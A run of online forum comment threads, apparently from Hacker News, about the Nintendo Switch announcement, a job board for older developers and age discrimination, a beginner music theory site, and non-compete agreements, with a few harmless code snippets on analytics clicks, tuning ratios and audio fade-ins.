In a space currently dominated by two nearly-identical competitors (XBONE and PS4), I think Nintendo has the opportunity to capture a large portion of the market.

This is a pretty brilliant move in concept. While phones and tablets have encroached on the handheld gaming space, the DS is still a huge success and where Nintendo has continued to dominate the market.

As a parent, I have 4 of the current gen DS systems. One for myself and one for each of my three children.

Nintendo has really struggled to stay relevant in the console space though as seen by the Wii U's underwhelming sales.

If this device is priced right and can continue their virtual handheld monopoly, then they become a sort of de facto console system for the masses. For the first time in ages I'm curious to see what is going to happen with Nintendo.

I'm quite excited by this. The video was a bit lengthy but it demonstrated the concept quite well.

Glimpses of Mario, what appeared to be Skyrim, too - more third party support this time perhaps?

I'm most interested to see the price and the spec of the machine. Xbox One and PS4 seem to have become more homogenised in terms of architecture than the last generation of consoles (PS3 was especially weird), if the Switch follows suit it would hopefully encourage more third party support. Assuming the power is there.

This looks amazing - nice form factor for easy use on the go (demonstrated in many ways in the video, including on airplanes), but still letting you have a classic game experience. It shows smart usage of now standard wireless tech and highly portable & fast storage.

It's amazing how slowly game consoles change, beefed-up computing capabilities aside, and while Nintendo has had some hits and misses, this shift looks like a vast improvement over the initial ideas brought forth by the Wii U.

Very promising. I like how haptic it is. Part of the magic of old Nintendo was the feeling of slotting in a cartridge, and handling a well-designed device and controller. They will not go back to cartridges, obviously, but it seems like they put a lot of thought into this... like car engineers do when they have the doors make a specific sound when they close.

Price point: How much is this going to cost per unit? I'd imagine it's going to be much cheaper than the other current gen consoles

Battery life: If it doesn't get more than 1-2 hours, or else come with some way to extend the battery life via an accessory, it will be kinda underwhelming.

That being said, this is a very intriguing idea, and is a good focus on an easy to understand concept. Funny image: Two people playing on a Switch with the controllers snapped onto it, doing some top down game like air hockey or something.

Of the featured use cases, gaming on a plane is the only one that made a ton of sense to me. (Binging on Stardew Valley on a laptop during my last trip to China actually helped a lot with jet lag recovery.) The other featured cases, I'm not so sure. I definitely miss the days of my youth when my friends and I huddled around a TV split four ways. But I also don't see us returning to gaming together in person either. The most bizarre use case featured is for esports--I see no advantage to using the Nintendo Switch versus a more powerful console or PC in competitive gaming.

As a piece of hardware, this looks really cool and innovative. But I don't actually know if the product-market fit is there.

It's perfect. It was the obvious direction putting together the ideas that the Razer Edge and various snap-on-phone gamepads and the controllers of the Wii and the Wii-U implied, as well as Nintendo's attempts to create input-parity with the Wii-U and the DS by having them share the same "2 screens, one is touch" layout.

Not really relevant to anything, but I'm so grateful the movie includes the guy on the plane playing the Switch while ACTUALLY WEARING HEADPHONES. People who play videogames (or movies) on planes while piping audio through the speaker for everyone to "enjoy" should be force-ejected through some kind of special chute.

You know, I always thought the idea of a hybrid console/handheld was a terrible idea. I expect that mobile considerations are going to make it graphically underwhelming compared to the next Xboxes and PlayStations. I also figure that graphical considerations for TV play are going to make it eat battery. We'll see if the jack of all trades is master of any.

But, on the other hand, Nintendo's games are just plain fun. I didn't buy a Wii U because I didn't want that giant tablet controller and its charging stand taking up space on my coffee table, but every time I saw Splatoon I wished I had room for it.

I just don't have faith in Nintendo anymore; they have a track record now of so many failed consoles and disappointments, and a lack of third-party support. Even the new Zelda doesn't get me that excited (and I've been a die-hard fan for years; playing Ocarina of Time as a kid made me want to learn how to make games). We'll see how this one turns out.

Looks really cool. Too bad it's not out in time for Christmas. The thing would sell like crazy this year.

What I find most notable in the video is their nod to competitive gaming / esports, which Nintendo has such a long history of shunning/disrespecting/misunderstanding. Maybe they're finally trying to atone for the debacle around the whole Smash scene? (Then again, maybe it's just that the marketing people who put this video together thought that would be fun to add and have no idea about Nintendo's history here.)

If they've switched to a capacitive touch screen instead of resistive then there's the potential for easily porting Unity based Mobile iOS/Android games to this.

This could be a great new marketplace for indies that make pay up front mobile games.

F2P mobile games monetization strategies rely on huge install bases that the Switch is unlikely to reach, so porting these games over may not make as much sense, but it could still be worthwhile to port to the device in order to provide more gameplay options to existing users.

I must be very out of touch with the gaming habits of millennials. The intro movie itself seemed like some nerdy wish-fulfillment. Who acts like this? Where can I meet some stunning gaming hottie like the one in the airport? Will the Switch make my life this fantastic?

My family has a Wii U, and it's connected to the only TV we really use in the house. The Wii U game pad permits pad-only play on some, but not all, games and doesn't have any capacity for multiplayer on it. I think this addresses the, "someone is taking over the TV" and, "take it outdoors" kind of use cases very nicely. Surprised they didn't play up the family aspect of it for that, but I guess that's an (only?) already-captured demographic.

Looking at the concept video it's clear that Nintendo is doubling down again on the idea of personal, physical interaction as the concept for multiplayer activities -- the "you and a friend in the living room" idea. I applaud this, but online gaming is something that Nintendo really struggles to "get" and has cultural issues with as well.

There was an article (Gamasutra, maybe?) about how Nintendo, with the Wii, fundamentally had no idea what their competition was up to or understood gaming notions that had become very commonplace by that time - like online matchmaking, etc.

However, as a gamer, I think this is definitely setting a differentiable and right path that doesn't tie Nintendo to just selling another port target for games.

I'm reminded of this old Reddit post that presages some of what's in this video:

Everyone is worried about graphics. Nintendo systems have never been about graphics. It's all about the games. They have combined two of the best-selling consoles EVER. The DS is the second-highest-selling console ever. The Wii is fifth. The Switch brings both of them together. You can experience the awesomeness of Nintendo literally anywhere at any time. You can't get that with any other console. Now they are bringing in major titles and giving us multiple good controllers for when they are needed. That's fucking awesome. I was about to buy the PS4 Pro edition, but fuck that, I'm waiting for this. I'm hoping they still allow 3DS controllers to connect to the console so I can play with my 3DS friends with the portable device and the dock.

I often wonder whether it would be a good idea for Apple to acquire Nintendo, and have them focus on building phenomenal gaming experiences on the iOS platform through focusing on software and device accessories (e.g. controllers). For some reason Apple and Nintendo in my head feel like they share important DNA traits.

I read somewhere that it seems the Switch won't be region-locked, which is very interesting. I wonder if Nintendo is cutting the initial 3rd-party devs a deal on the new cartridges then (considering they'll likely still be more expensive than your standard Blu-ray disc).

Skyrim was released almost 5 years ago, yet an updated version of it is used to advertise the capabilities of a next-generation console. It's really disappointing to see the amount of recycling in entertainment in the past 10 years. More disappointing that people eat it up.

Also, the entire selling point is being mobile crossover. That seems like a great secondary feature, but alone... that's it? Where is the imagination that brought us the Wii?

I can only hope Nintendo attracts enough development to make interesting (perhaps Pokemon Go-influenced) unique crossover use cases, beyond just playing the same game the same way on a TV and at the airport.

No touch controls or motion controls in sight! I think they'd ultimately be incompatible with this anyway.

You can't have good local portable multiplayer if one player always has their fingers on the screen, blocking the other's view.

Motion would be very haphazard, due to all the usage styles. Where would the motion sensors go? If it's part of the tablet, you can't play while docked to your TV. If it's part of the joycons, you'd probably have to remove them to play some games, which would be again annoying if it's docked. If the pro controller has motion controls as well, some games requiring both joycons wouldn't bother using it. You'd have to have at least 4 sets of motion controls across the parts for it to work ubiquitously.

All in all, it makes a lot of sense that we might not see those 2 clunky features returning, which is great.

But all the bits (dock, tablet, 2 joycons, joycon mounting stump, pro controller) are a bit too clap-trap for me. I had used Wii Fit for a while on someone else's Wii and liked it, so I got the Wii U version. The addition of the touchscreen plus wiimotes in the Wii U made it a mess of always picking up and putting down things, which was super annoying. Having fewer input schemes, and using them well, would be preferable, in my opinion.

This looks like a very well designed console, and I appreciate that Nintendo takes chances and tries to offer something different with each console release.

The crucial element that is going to determine whether I purchase this or not is: will it support location-based gaming? Touchscreens, gyros, and cameras aren't necessary, but location-based gaming and the spontaneous, real-world social interactions it generates were the only reason I played Pokemon GO. I do understand that designing games with this in mind and making them fun for all players is a difficult if not impossible problem to solve for those who don't live in dense urban areas.

I'm also disappointed that Nintendo isn't developing for VR yet. While I respect them for not following the herd, if any developer is going to lay the foundational design patterns for VR gaming, it's Nintendo. Mario 64 and Zelda: Ocarina of Time did this for 3D.

This is a good idea and seems well-executed. While still essentially a gimmick, the portability is a much better and more useful gimmick than the Wii's motion controls or the Wii U's touchscreen controller. It seems to get in the way of gaming much less than those did.

Unfortunately, while it's a rather good gimmick, it seems like Nintendo is repeating its usual mistake of sacrificing gaming power for it. Releasing a device with a 720p screen in 2016 is almost as bad as releasing a device with a 400x240 screen in 2011, in my opinion.

Nintendo has a very bad habit of making devices that compete with the previous generation of its competitors' devices instead of the next one.

I dunno... I never play games except at home now, so there's nothing interesting here for me. It's just gonna come down to whether I want to play Smash / Mario Kart / Mario, like it pretty much has since the GameCube.

I rather doubt the graphics quality could be as nice as shown in the demo while maintaining decent battery life. I'd guess the final graphics won't be much better than the PS Vita's. Still, it looks like a really exciting concept, so I'm really looking forward to the release and would like to see how it goes.

Anybody have any info on how the Switch will be backwards compatible with Wii U discs (i.e. a portable drive perhaps), and 3DS cartridges? I have a stack of Wii U games that hopefully will still be playable.

Is it like a Wii U flipped? It awfully resembles the Gamevice controller for iPad - https://gamevice.com - except it's also an iPad, which is as big as 12 inches! How does the Switch get its content, by download or by old-fashioned cartridge (I'm totally cool with that)? And lastly, how long does the battery last??

This actually looks amazing. I haven't bought a game console in a while and have in fact been actively avoiding them in favor of PC gaming and Steam, especially now that we've got the Steam Link and Steam Controller. However, this has enough value add that I could totally see myself buying this. This might just be the best thing I've seen from Nintendo in a long time.

I personally feel this is going to be mediocre at best:
1. Limited appeal to mainstream consumers.
2. Awkward physical spec; the tablet's downfall pretty much proved how big a mobile device should be.
3. No one would want to write games for this...

I wonder if the Tegra X2 in here would be at all able to use any other Nintendo devices as an external GPU, since they now include the Pascal architecture. For example, possibly using the new Nintendo NX with the Switch somehow. Just a thought.

I didn't get it... is it a handheld or a phone/tablet device? My question is whether it would replace my phone or just be another device in my backpack, like the iPad, laptop, and tons of extra chargers I carry almost everywhere.

Does anyone else think the controller stick on the right looks like a problem? I can't help thinking that I will keep bumping the analog stick if I attempt to use my thumb to press the buttons at the top.

What happens if multiple people from the same household want to use local multiplayer on different screens? That's the only case where the one-to-one relationship between console and portable screen breaks down.

Can I interpret that as "we missed the holiday season, and are pre-announcing this because we think its Osborne effect (https://en.wikipedia.org/wiki/Osborne_effect) will be smaller than its effect on the sales numbers of our competitors"?

Seems like it will be a challenge to build games that are compelling on both a large screen while seated in your living room and on a small screen when you're out and about (from both a UX and gameplay perspective).

With that said, it's a smart move to use the same controller for both use cases.

It's interesting to me to watch a video about a new gaming platform and have that video show me all the ways in which said platform will destroy nearly all forms of real human interaction with others, reducing us to unthinking drones looking at screens moving little virtual characters around while our brains whittle away.

This is the problem with the gaming industry. It's the equivalent of very smart engineers using their skills on the web to find ever more effective ways to make people click on ads. It's such a waste of human talent.

Gaming is different, but not really. Most of the popular games have no real redeeming qualities. They are black holes into which youth get sucked, burning hours, days, and years and, in extreme cases, ruining their lives. This, I think, is despicable.

If you want to do well in gaming you have to use your skills to find ways to create addictive games that shift a person into a Pavlovian state where they want more, they keep clicking the buttons and, eventually, they send you money. This has certainly been proven by the iOS space. Games like "Clash of Clans" are among the many examples of this.

Getting truly creative to find ways for people to engage with more intelligent and useful activities is very, very difficult. And so, to usurp part of a phrase that paints an amazing image...when they go low, we go lower.

I have long been disenchanted with what the gaming industry has done to kids. It's making money at the expense of their brains and emotions. It's selling drugs in digital form.

I never used to think this way, until I saw the effect on my own kids. To make a long story short, my two little ones started lying to us and playing a couple of these addictive games on their iPods.

We have a simple rule at our house: on Saturdays you can play the available games for a couple of hours. The rest of the week, play with Legos, go outside, play with the dogs, etc.

This worked very well for many years (almost 18 to be precise). In fact, in a lot of cases they'd play less than two hours because they'd get sick of it and prefer to go for physical play.

Until a couple of games surfaced. And they, like evolved bacteria, became immune to the mechanism that made my kids decide to stop playing. Soon we would discover them playing the games in secret under their blankets at 11 at night instead of sleeping. Warnings did not work, and after a couple of them we took the iPads and iPods away. They had become destructive devices rather than the opposite.

My kids were lying to me in a manner which I would imagine was no different than kids lying about taking drugs.

They've been off the iOS devices and these games for a year. They get their devices back in January. Cleared of all the addictive games. We'll see what happens.

So, yeah, I look at a video like the one for the Switch and immediately imagine how many lives it will destroy if used as portrayed.

Oh my god, a sane name for once. It was really getting out of hand with the DS and Wii, when the same name referred to several different generations of hardware in a non-obvious way. (DS, DS Lite, 3DS, 2DS, New 3DS; try making heads or tails of that.)

So instead of a portable screen/controller like the WiiU that's separate from the main machine - the main machine IS the portable part that could easily be dropped/broken, now? Or am I missing something?

Why not create a VR/AR console hybrid that lets you create things at home and then experience them in the real world... digitally graffiti your town at home, then go out and check out your artwork and/or messages? Maybe that's an app already... leave your friends messages in certain locations, seen via an AR app?

Can you do another good deed and require your posters to include salary range in their job ads?

It's the norm in the UK, and we successfully forced this in Poland (though posters here almost NEVER used to include salaries). How? The companies need IT staff so badly that almost all IT job boards (at least the most popular ones - like FB groups or https://nofluffjobs.com) started requiring the salary range.

I think your idea is praiseworthy, but I'd never ever create a website like this with hidden salaries. Especially in your case - it's so cool people post jobs on your board, but what if they do so because they're offering 10, 20, 40% less, since it's a place for "old geeks that no one wants"?

I'm really super proud that if an IT ad in Poland has no salary range, most of us just ignore it. And it took us maybe 2 years to get to this place. I think every other country should follow the lead and end the "competitive salary" trend. I don't want to spend 3 days on interviews just to discover that the salary offered is way too low for me. A salary missing from an ad is a big lack of respect; the sooner people realize that, the better.

Here's the deal: Employers will exploit your age no matter how old you are. There is no "perfect age" for a developer. When you're young, they exploit you because you are inexperienced (especially at negotiation). When you are "old" they exploit by trying to play the age card. "Not a cultural fit"--LOL--fix your stupid culture and stop exploiting people, you smug fools!

So what is there? A ten-year "ripe" age range where you're good enough to code but don't have a wife and kids? Blatant exploitation of human capital.

As far as "moving up to management" that's a load of crap. There aren't enough management positions to soak up all the age 35+ developers out there. It's an extremely narrow funnel. For the winners of that race, the prize is a lifetime of quiet suffering: You'll be lucky if you retire without major depression, anxiety, heart problems, or all three. I wonder what the mortality statistics are for people who work as IT managers?

There is also this role called "architect." Do not be enticed. It is, at best, a torturous role, and at worst, it's a redundant role that people who were only so-so at coding get promoted to so they can no longer annoy the rest of the team. The effectiveness of any given architect decays exponentially from the instant they stop coding and start attending meetings all day.

Basically, you either keep coding and stay relevant or you go do something else completely. The rest is bs. But don't for a second imagine that companies aren't exploiting you by making you uneasy about your age or whatever else can be thrown in front of you to try and confuse, diminish, and lowball you.

I wish folks like Bray had championed this cause 20 years ago. It may not have done much, but... it feels a bit weird to hear old people complain about discriminatory impact. I can't say he was a contributing factor to the ongoing 'youth culture', but... it wasn't hard to see this coming.

My situation may be somewhat unique, in that I've had grey hair since I was 18. Not a HUGE amount at 18, but... people noticed. By the time I was in my mid 20s, it was definitely noticeable - more pepper than salt still, but noticeable. By 30... there's a fair amount of grey showing. Early 30s I've got people thinking I look good for being in my late 40s (had that more than a couple times).

But when it came to interviewing and opportunities, I was already feeling the age stigma in my late 20s. "Not a cultural fit" - not even in silicon valley mind you.

I had someone interviewing me - early 30s - say, "Well, your resume only goes back about 12 years or so; what were you doing before that?" "High school." "Whoa..." I later found out he'd assumed I was mid-40s.

Could I dye my hair? Yeah, but... it's a pain, and... other parts of me will get old too. Not worth it; I want to get hired based on ability, etc.

What's sad is to hear about the mid 30s folks wanting to get plastic surgery to look younger, which just validates and perpetuates the continuous youth culture. May not be possible to fight it at the Facebooks and Googles of the world, but it shouldn't be this bad...

I thought I was on medium.com... You need to add a call to action to the end of your post! Add a short line - "if you've experienced ageism, check out these job listings at /link" or "to see what I built, visit /link" or something similar. Lots of lazy people want to click a link at the end of your post to see your site rather than trying to find a link in your profile or scrolling all the way to the top. Plus, when someone inevitably copies your content, you get a free link.

I thought I was hot shit when I had 5 years under my belt, too, just like those whipper snappers. Took another 10 to recognize how full of shit that idea was.

I think there's a certain niche that wants to hire experienced, disciplined and reliable "old" geeks like you (or actual old guys like me...still grinding code at 50). Looks like you're going to own it. Well played.

It sounds like everything worked out perfectly for the author on that fateful day. What are the odds that a stranger saw the author's initial (unsuccessful) post in the HN 'new' section and decided to write a whole article about it, post it to HN (with a link to the original form) and that this new post made it to the front page... Then it crashed... But thankfully there was an HN moderator on that day who cared enough to edit the link to send users directly to this form.

It sounds like the author made the most of it though, so I guess it's well deserved.

Whoa - did I miss the announcement that old is now 35 and above? Given the working age range of professional engineers in the SF field, it's sad that it's not easier to invert the problem and build a Young-Fun-and-Full-of-Recent-Academic-Course-Material-Jobs.com.

I hadn't seen this site before, and I think it's a great idea. Though I'm young, I am certainly terrified about the trend of age discrimination in the valley - after all, we all age! I'm glad to see folks trying to make a meaningful difference in the trend. Perhaps through good samaritans such as OP, those same twenty-somethings that reject so many qualified applicants on account of age will receive better treatment when they themselves reach 35 or 40.

> spent an hour putting up a Google form and static site on a cheap Digital Ocean instance.

Now I feel like the Old Geek (I'm 32):

What's the deal with Digital Ocean? If the website is static and receives content by manual copy-pasting from a Google sheet (as outlined in the article), why bother with Droplets and Storage and all the other configuration? Why is good old web hosting (the kind where you just upload your html/php/js via FTP and it all just works) not good enough for this? Really curious.

I really like how the author posted the fake price tag before spending time implementing payment processing - an easy way to verify people will pay for it, at a low cost of experimentation. I've heard of other companies using similar strategies, like A/B testing features that don't exist yet to figure out what they should build next.
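(This pattern is sometimes called a "fake door" test. A minimal sketch of what it might look like, with a hypothetical endpoint and copy, purely to illustrate the idea:)

```typescript
// Fake-door sketch (all names and the endpoint are hypothetical): show a
// "Buy" button before payments exist, log the click as purchase intent,
// then apologize gracefully instead of charging anyone.
function fakeDoorBuyButton(container: HTMLElement): void {
  const button = document.createElement("button");
  button.textContent = "Post a job - $50";

  button.addEventListener("click", () => {
    // Record the intent signal; "/analytics/fake-door" is an assumption.
    void fetch("/analytics/fake-door", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ experiment: "paid-posting", ts: Date.now() }),
    });

    const note = document.createElement("p");
    note.textContent = "Payments are almost ready - check back soon!";
    button.replaceWith(note);
  });

  container.appendChild(button);
}
```

If enough visitors click, it's probably worth building the real payment flow; if nobody does, you've saved yourself the integration work.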

I just joined a new company and I feel a little reverse ageism on my part. My team and most of the company's employees are at a younger point in their lives. After leaving a company where I could talk to people about kids the same age as mine and such, I find it all a little unnerving and uncomfortable. They've been fine, and I imagine once I've been there a while it will be OK, as I still have people outside of work to talk to, but it will take a little getting used to.

I wonder if the problem is specific to ageism in individual contributor roles. I've worked at a few startups where maybe 1/3 of the product team was over 40, but I can only think of two coworkers over 40 who didn't have any direct reports. Do we find ourselves wondering why an individual hasn't "advanced" to a management position after 10+ years?

Congratulations on seeing the opportunity and quickly moving to do something about it. It is unique enough at first sight that you got early coverage in the press, which is very helpful.

Quick question: I did not see anything unique to "old geek" in the website, other than the URL of course. I guess it is an implicit assumption by both job seekers as well as job posters.

On that note, where would this concept be headed if other job sites added a simple attribute called age (or something similar but more palatable) where job posters could specify their preferred age range, and job seekers could search on it?

Sir, a fine website, one that I cannot take advantage of because I am in Australia. However a minor point - I do have some difficulty seeing the pale green highlight around the positions, I believe it may be to do with my red/green colourblindness, common amongst men, it is almost impossible to see against the bold blue. If you are feeling creative maybe you can change the colour of the highlight to a different less pale green or another colour. Thanks again for your site and congrats on your success. Cheers.

What I really like about this is how the interface is so dead simple. It could be the Craigslist of job postings with the $50 barrier to entry to filter out shitty posts. My advice is to not overdo it with features and KISS.

Great site! And thanks for taking my feedback in stride about the "tell people you heard it on oldgeekjobs.com" not being appropriate for the scraped jobs! The change (along with prioritizing paid ones) looks great!

On one hand, I'm getting older. On the other, my skills are getting better. The younger people I work with can't keep pace with me. And my employers aren't unaware of the fact that it is indeed a zero-sum game, so my age (early 40s) has never been an issue so far. I believe there are, and will be, many employers who look at nothing but what you bring to the table. As a businessman, you wouldn't be foolish enough to hire only noobs.

Idea to make even more money (if you become a billionaire off it, please make me a millionaire too :) ): there are services that post jobs to multiple job boards. Create an API they could hook your site into easily and offer them a $20 discount, so they can offer your service to their customers for $40 and also earn $10 per job posted to you.

Examples of such sites that come to mind are ziprecruiter.com and broadbean.com

That early "Hacker News Effect" really got you off to a roll, and you made the most of it. Have you ever thought what would have happened if that Wordpress write-up was not created, or didn't get such a good response on HN?

If there's an insistence on a fixed-width font for the site, I really wish it were something more like Consolas/Inconsolata, etc. The job descriptions are nearly unreadable on my display: light gray, with a relatively thin font weight.

If someone wants to try music, start by playing an instrument and then pick up the theory. Whereas in physics, theory says how the world works, music theory is mostly about labeling what sounds good versus noise. And it's hard to get the words without playing first.

I like this! I've always wanted to build a music theory textbook (like Laitz) where the examples could be played.

> When a song says that it is in the key of C Major, or D Minor, or A Harmonic, etc. this is simply telling you which of the 12 notes are used in this song.

Small nitpick: this is not accurate. C Major and A (natural) Minor have the same notes but different starting notes, so they are different scales, and pieces written in them sound different from each other. It's one of those things that's slightly hard to explain if you don't sing/compose/play an instrument/read music, but very obvious if you do.

One thing that I don't see in it, but that I find fascinating, is that in western music each half step represents a ratio of the twelfth-root of two, in terms of frequency. That way 12 half steps (an octave) will double the frequency.

Certain notes within this are close to, but not exactly on, a "simple ratio". It's just coincidental that it works out pretty well. (Although you could make it work out just as well with something other than a 12-step scale... a 19-step scale has been used: https://en.wikipedia.org/wiki/19_equal_temperament )
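To make that concrete, here's a small sketch (TypeScript, my own illustration) of the twelfth-root-of-two math, and of how close the tempered intervals land to the simple ratios:

```typescript
// Equal temperament: each half step multiplies frequency by 2^(1/12),
// so 12 half steps exactly double it (one octave).
const SEMITONE = Math.pow(2, 1 / 12); // twelfth root of two, ~1.05946

// Frequency of a note n semitones above a reference pitch (e.g. A4 = 440 Hz).
function frequency(reference: number, semitones: number): number {
  return reference * Math.pow(SEMITONE, semitones);
}

// Tempered intervals vs. the "simple ratios" they approximate.
const intervals: Array<[string, number, number]> = [
  ["perfect fifth", 7, 3 / 2],
  ["perfect fourth", 5, 4 / 3],
  ["major third", 4, 5 / 4],
];

for (const [name, semis, just] of intervals) {
  const tempered = Math.pow(SEMITONE, semis);
  const cents = 1200 * Math.log2(tempered / just); // deviation in cents
  console.log(`${name}: ${tempered.toFixed(4)} vs ${just.toFixed(4)} (${cents.toFixed(1)} cents off)`);
}

console.log(frequency(440, 12)); // 880: twelve half steps double the frequency
```

Running it shows the fifth and fourth are off by about 2 cents, while the major third is off by almost 14 cents, which is exactly the "close, but not exactly" point above.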

Anyway, I think that would fit in well with what you've done so far, but obviously, explained in the nice simple graphics that you seem very good at.

I also must say I love the way you use color. I have a music project of my own (that I'm hoping to debut very soon) that also uses color in a very similar way. Did you know that Isaac Newton fixated on 7 colors (ROYGBIV) because he thought there was a connection between the diatonic scale and colors? That's why indigo seems to have been promoted from some obscure color to one of the "basic" colors of the rainbow. (I prefer ROYGBPP: red-orange-yellow-green-blue-purple-pink.)

I'm kind of late to the game in this thread, but my thought about theory is that it should start with physiology and technology. At each level we're reminded that we study the aspects of music that people have already invented, and that we may overlook a lot of important things, such as rhythm.

Physiology: Some of this may be speculative, but it seems likely that "harmonious" intervals, whose harmonics superpose, have a physiological effect.

Technology: The 12 tone scale could be described as a technology for tuning an instrument with harmonious intervals. Temperament is a technology for solving the problems of tuning primarily keyboard instruments.

Naturally, math is involved in understanding these things, as with many areas of science and technology.

I would talk about a handful of widely used instruments, such as keyboards, strings, winds, guitars, and drums.

Then you can begin to talk about scales, chords, melody, form, and so forth.

I wish this was even more "from first principles." I wish the "harmony" section would point out that the "simple ratios" they initially show both have powers of two in their denominators, and thus are just octave adjustments of the harmonic series. I wish the "chords" section would derive the major triad as the fundamental frequency combined with the first two (non-octave) frequencies in the harmonic series octave-adjusted down to be close to the fundamental.

There's not a smidgen of principle in the jump from harmonic ratios to tempered tuning and standard scales and chords.

True first-principles music theory must (A) focus primarily on psychology over physics (B) not tell people that complex ratios sound bad but simply help people notice that they are different from simple ratios (C) actually go through the full logic of how the tempered system is derived from chains of harmonic ratios adjusted to temper out commas. The easiest approach to the latter is to simply teach diatonic scales as harmonic ratios and not introduce temperament at all until much later.
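As a sketch of the octave-adjustment step described above (my own illustration, not from the linked site): fold the 3rd and 5th harmonics down by octaves and the major triad's 4:5:6 ratios fall out.

```typescript
// Fold a harmonic down by octaves until its ratio to the fundamental
// lies within one octave, i.e. in [1, 2).
function octaveReduce(ratio: number): number {
  while (ratio >= 2) ratio /= 2;
  return ratio;
}

// The first two non-octave harmonics are the 3rd and the 5th.
const fifth = octaveReduce(3); // 3 -> 3/2 = 1.5   (perfect fifth)
const third = octaveReduce(5); // 5 -> 5/4 = 1.25  (major third)

// Fundamental plus the reduced harmonics: the major triad, 1 : 5/4 : 3/2,
// which is the same as 4 : 5 : 6.
console.log([1, third, fifth]); // [1, 1.25, 1.5]
```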

Anyway, I'd write the ultimate thing if I ever found the time. There are at least some good elements to this attempt so far. It really needs to be licensed CC-BY-SA, though, so that people can adapt, contribute, and improve it to get it to where it's really good.

Interesting, but too bad it's not much more than the basics. I struggle to find a good explanation of how harmony works, i.e., what is meant by terms like "resolution" or how chords are made; in short, how a musical piece is built.

My piano teacher's refusal to explain these to me is one of the reasons I lost interest in the instrument.

Great idea! Just FYI, I'm noticing a fair bit of static when playing the various tones. It's mostly at the onset, which makes me think it's just due to the discontinuity when the tone starts (maybe start the volume at zero and quickly increase?). But I'm getting blips of static in the middle of most tones as well, so there must be something else going on. Tried both Chrome and Firefox. I suppose this could be an artifact of my onboard sound card or something like that, but I haven't noticed anything similar elsewhere.
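(If the site's author is curious, here's a minimal sketch of that fade-in fix using the standard Web Audio API; the frequency, gain, and timing values are just examples:)

```typescript
// Ramp the gain from 0 at onset and back to 0 before the tone stops;
// this removes the click caused by the waveform's discontinuity.
function playTone(ctx: AudioContext, freq: number, duration = 1): void {
  const osc = ctx.createOscillator();
  const gain = ctx.createGain();
  osc.frequency.value = freq;
  osc.connect(gain).connect(ctx.destination);

  const now = ctx.currentTime;
  gain.gain.setValueAtTime(0, now);                     // start silent
  gain.gain.linearRampToValueAtTime(0.5, now + 0.01);   // 10 ms fade-in
  gain.gain.setValueAtTime(0.5, now + duration - 0.01);
  gain.gain.linearRampToValueAtTime(0, now + duration); // 10 ms fade-out

  osc.start(now);
  osc.stop(now + duration);
}
```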

Well done! It summarizes a lot of theory it took me months to puzzle out on my own.

One nit: At the top of each section there is a section title; at the bottom of each section there is a "Next section" title, a description, and a next-section button; and on the side there is a list of sections. Some of the titles are inconsistent from the list to the top of the current section, and from the bottom of the current section to the top of the next. It's a little confusing right now, and there are only a few sections; when there are more, it will be far more confusing. I don't have a suggestion as to how to fix it, just pointing out the confusing inconsistency.

This is the perfect minimalist introduction to music theory. A similarly good explanation is in Daniel Levitin's "This Is Your Brain on Music". Its first few chapters explain music theory to beginners in a really elegant way.

This is great! I found the more robust examples really useful, like the ones that show notes and triads in a key. I'd love to have something like this in the form of a VST or something usable in Ableton.

This is great, but there was recently an article that made the rounds on HN pointing out that what sounds 'nice' to people not exposed to Western music is very different from what sounds 'nice' to Westerners. This is a great site and people can learn a ton, but it's very Western-centric, and it might be worth pointing that out early on.

I don't understand why there are so many people in the comments defending non-competes. They have literally no value to society, or to individual employees. They are a tool of restrictive coercion to stifle an employee's freedom of movement in the job market.

The only thing a non-compete does is say that Employee A cannot work in their chosen field for some period of time after they are fired or quit. And the contract typically offers no consideration or compensation in return.

So your employer underpays you by 40% and treats you badly? You want to leave for greener pastures at that hip new startup that offered you a Senior Engineer gig? Well, sorry to say, you have a mortgage, a wife, and 2 kids, and that non-compete says you are only legally allowed to be a burger flipper for two years after quitting; software engineering is verboten.

Totally fair right?

If you don't sit on the board of a Fortune 500 company, you have literally no incentive to support non-competes. There is no rational basis to argue in their favor. Please learn the difference between NDAs, IP assignment agreements, and non-competes before lending non-competes some mystical powers they don't have.

Note that this is being proposed as something states should do. Federal legislation is not being proposed. Worst case would be Federal legislation which was weak and pre-empted state legislation, weakening California's ban.

California employment law prohibits non-compete agreements for employees, and has since 1872. California also prohibits any employee agreement which claims employer ownership of intellectual property developed on the employee's own time.[1] This is one reason Silicon Valley is so successful.

Non-competes: the most anti-innovation, anti-skilled-worker, anti-free-market, anti-business, and anti-American thing at work today. Non-competes are protectionism for large businesses over small/medium businesses.

As a freelancer, contractor, and self-employed business owner/worker: please make these illegal. I'm tired of them.

The worst part about non-competes is that they are usually blanket protectionism, lasting up to 2+ years; this sometimes happens on a job that is only 1-3 months long. You have to laugh at those situations. Usually the client will push them aside or lower the term to the length of the job plus some time, but both non-competes and arbitration agreements are horrible for workers in today's economy, where people change jobs frequently and many are self-employed/freelancing/contracting.

The non-compete should not exist; at its core, blocking skilled workers from competing in our economy is bad all around, unless you are one of the current big fish.

I'm not sure if you came here for anecdotes, but my very first full-time web developer position had a non-compete clause. After 2.5 years, I moved to a new company about 15 miles away for a roughly 20% raise. Some time into this job, I ended up doing some work for a client that had left my previous employer. I reached out to the previous employer because I needed something changed on the server (they still managed hosting) - this tipped them off that I was (gasp) doing work for one of their previous clients. They ended up attempting to sue me and my new employer based on the non-compete! We went to a deposition, but then the lawyers huddled, and the end result was that the non-compete was reduced from 5 years (!!) to just 1 year, and we agreed I wouldn't do work for that specific client for the duration. Otherwise, there was no penalty or fallout. I consider it a big dramatic show with no benefit to the previous employer; they stomped their feet and pouted, the end.

Depending on the phrasing of the non-compete, I tend to cross that section out, initial it, and then include a note when I submit it to my employer. Most are fine with that change.

Today, after completing almost a month of my trial at a new job, HR asked me to sign a document on stamp paper with a very vague 1-year non-compete clause. All my objections were casually shrugged off by her, saying they wouldn't use it unless I directly hurt the employer's revenue.

When I refused to sign it, she said that it might be hard to offer me a job if I didn't sign it. Which very much sounded like a threat to me. If they insist, I will most probably sign it, as without the salary I wouldn't be able to afford rent next month. According to her, all the other employees have signed it and none questioned her on it.

Notably, non-competes are mostly illegal in India, yet almost all agreements I have come across include the clause. I don't understand the point of having a clause like this when it's unenforceable.

Many other points of the agreement were as egregious as the non-compete clause, and the whole agreement was extremely one-sided. It also said all the IP/products/patents I develop, even in my own time, during my tenure would belong to the employer.

I don't understand how these clauses are even legal in the first place. They violate the basic right of freedom of work. You can't have freedom of enterprise on one hand and no freedom of work for employees on the other. The worst thing is that these agreements usually come with zero compensation.

